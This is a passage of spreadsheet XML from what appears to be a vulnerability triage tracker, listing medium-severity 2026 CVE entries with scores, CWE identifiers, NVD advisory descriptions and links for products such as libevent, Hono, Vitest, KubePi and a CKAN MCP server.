      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr"/>
      <c r="Q856" s="5" t="inlineStr">
        <is>
          <t>CWE-567</t>
        </is>
      </c>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="S856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79969</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80051</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr"/>
      <c r="Q857" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>github.com/graphql-go/graphql (GraphQL for Go) through 0.8.1 does not validate that a scalar variable value matches its declared type. The built-in coerceString and coerceBool functions (scalars.go) accept input whose type does not match the declared String, ID, or Boolean scalar instead of raising the request error that the GraphQL specification mandates. In some cases (but not any typical case of JSON sent to a website), a deeply nested value leads to an unrecoverable "fatal error: stack overflow" condition.</t>
        </is>
      </c>
      <c r="S857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80051</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80341</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr"/>
      <c r="Q858" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not verify that a stored payment method belongs to the user attaching it, allowing any authenticated user, such as a subscriber, to bind another customer's stored card to their own account and then charge or delete it.
Exploitation requires the attacker to already know the payment provider's identifier for the victim's stored method, which the Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not expose.</t>
        </is>
      </c>
      <c r="S858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80341</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81646</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr"/>
      <c r="Q859" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in the graphics module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81646</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84363</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr"/>
      <c r="Q860" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.13.5, Hono's query helpers treat a question mark after a literal hash fragment as the start of a query string, so the application can read request parameters that browsers, new URL(), reverse proxies, filtering rules, parameter allow and deny lists, access logging, request validation, and other middleware do not observe. The Cache Middleware removes the fragment when building its cache key, allowing a response influenced by parameters inside the fragment to be stored under a key that omits those parameters and later served to other users. This can bypass filtering and auditing, poison cached responses, and enable stored cross-site scripting when an affected parameter is reflected into cached HTML without escaping. Exploitation requires a runtime and intermediary path that passes a literal hash character through to the request URL; Cloudflare Workers and intermediaries that strip fragments are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="S860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84373</t>
        </is>
      </c>
      <c r="D861" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E861" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F861" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr"/>
      <c r="Q861" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R861" s="5" t="inlineStr">
        <is>
          <t>Vitest is a testing framework powered by Vite. From 2.1.0 until 4.1.11 and 5.0.0-rc.2, the public mockerPlugin and standalone interceptorPlugin exports in packages/mocker/src/node/interceptorPlugin.ts register the vitest:interceptor:register handler on Vite's unauthenticated HMR WebSocket without validating redirect targets against the file-serving allowlist. The implementation processes event.redirect without enforcing server.fs.allow and server.fs.deny through isFileLoadingAllowed. A remote client that can reach an exposed development server can submit an opaque URL scheme preserving .. segments, causing join(server.config.root, redirectUrl.pathname) to resolve outside the project root. The plugin's load hook then returns readFile(mock.redirect, 'utf-8') as module source, disclosing local files readable by the dev-server process. Vitest browser mode uses a token-authenticated RPC and is not remotely unauthenticated by default, although the same boundary check was missing on that path. This issue is fixed in versions 4.1.11 and 5.0.0-rc.2.</t>
        </is>
      </c>
      <c r="S861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84378</t>
        </is>
      </c>
      <c r="D862" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E862" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F862" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr"/>
      <c r="Q862" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. From 2.5.0 until 2.10.0, the HTTPX2 Server-Sent Events parser in src/httpx2/httpx2/_sse.py repeatedly copies and rescans buffered text in _SSELineDecoder.decode() when an attacker-controlled or compromised SSE endpoint splits one unterminated line across many response chunks. The behavior affects httpx2.Client.sse() and httpx2.AsyncClient.sse(), and the total processing work grows quadratically with the line length, allowing a crafted stream to consume excessive CPU and block a synchronous worker or asynchronous event loop. This issue is fixed in version 2.10.0.</t>
        </is>
      </c>
      <c r="S862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87482</t>
        </is>
      </c>
      <c r="D863" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E863" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F863" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr"/>
      <c r="Q863" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>Cleartext transmission of sensitive data in HttpsUpgrades in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87482</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87590</t>
        </is>
      </c>
      <c r="D864" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E864" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F864" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr"/>
      <c r="Q864" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially leak sensitive information via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87590</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87737</t>
        </is>
      </c>
      <c r="D865" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E865" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F865" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr"/>
      <c r="Q865" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-ec package before 2.4.0 for OCaml. There is a timing side channel for NIST elliptic-curve scalar multiplication: the time required for a lookup can depend on a secret.</t>
        </is>
      </c>
      <c r="S865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87737</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63381</t>
        </is>
      </c>
      <c r="D866" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E866" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F866" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr"/>
      <c r="Q866" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has a use-after-free in buffer.c when evbuffer_add_buffer_reference processes an output buffer whose out_total_len is zero. evbuffer_free_all_chains frees the initial empty chain without resetting outbuf-&gt;first, outbuf-&gt;last, or outbuf-&gt;last_with_datap, and APPEND_CHAIN_MULTICAST subsequently dereferences the dangling chain pointer. A caller that can drive this buffer state can cause memory corruption or a process crash. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63381</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69129</t>
        </is>
      </c>
      <c r="D867" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E867" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F867" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K867" s="5" t="inlineStr"/>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr"/>
      <c r="Q867" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 2.0.0, cluster-scoped APIs do not consistently validate per-cluster access, allowing an authenticated user with cluster management permissions to operate on clusters outside the scope they were granted. Because the affected endpoints act on cluster-specific data without confirming that the requesting user is authorized for that particular cluster, a user assigned management rights over one cluster can, under certain role and cluster configurations, read or modify data in clusters they should not manage. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="S867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69129</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16180</t>
        </is>
      </c>
      <c r="D868" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E868" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F868" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr"/>
      <c r="Q868" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="R868" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 Toolkit could allow an authenticated user to cause a denial-of-service condition due to improper validation of XML entities.</t>
        </is>
      </c>
      <c r="S868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16180</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53509</t>
        </is>
      </c>
      <c r="D869" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E869" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F869" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr"/>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P869" s="5" t="inlineStr"/>
      <c r="Q869" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R869" s="5" t="inlineStr">
        <is>
          <t>CKAN MCP Server is a tool for querying CKAN open data portals. A known vulnerability CVE-2026-33060 indicated tools including ckan_package_search and sparql_query that accept a base_url parameter had the risk of making HTTP requests to arbitrary endpoints without restriction. A fix was applied to filter out ip addresses. However, a method to bypass exists prior to version 0.4.106. CKAN MCP Server validates caller-supplied CKAN server URLs by inspecting only the parsed hostname string before issuing outbound HTTP requests. In `src/utils/http.ts`, hostname aliases such as `ip6-localhost` are not equal to `localhost`, are not dotted IPv4 literals, and are not bracketed IPv6 literals, so they pass the SSRF filter but can resolve to loopback when the server performs the request. A remote MCP caller that can invoke CKAN tools with a `server_url` can therefore make the server connect to local or private addresses and, for CKAN-shaped responses, receive response-derived data. The updated fix in version 0.4.106 replaced the single `hostname === 'localhost'` check with a blocked-hostname `Set` covering `ip6-localhost` and `ip6-loopback`.</t>
        </is>
      </c>
      <c r="S869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53509</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57825</t>
        </is>
      </c>
      <c r="D870" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E870" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F870" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr"/>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr"/>
      <c r="Q870" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="R870" s="5" t="inlineStr">
        <is>
          <t>In the opam package before 2.5.2 for OCaml, the sandbox protection mechanism can be bypassed because symlinks are mishandled during use of .install files.</t>
        </is>
      </c>
      <c r="S870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57825</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63380</t>
        </is>
      </c>
      <c r="D871" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E871" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F871" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr"/>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr"/>
      <c r="Q871" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-476</t>
        </is>
      </c>
      <c r="R871" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.2.2-alpha, libevent can dereference invalid list pointers in ws.c when evws_new_session enters its error path after evhttp_start_ws_ succeeds but bufferevent_enable_locking_ fails. evws_connection_free sees a non-null http_server and unconditionally calls TAILQ_REMOVE even though the session was never inserted into http_server-&gt;ws_sessions. A local caller able to induce this allocation or locking failure can crash the process. This issue is fixed in version 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63380</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85788</t>
        </is>
      </c>
      <c r="D872" s="5" t="n">
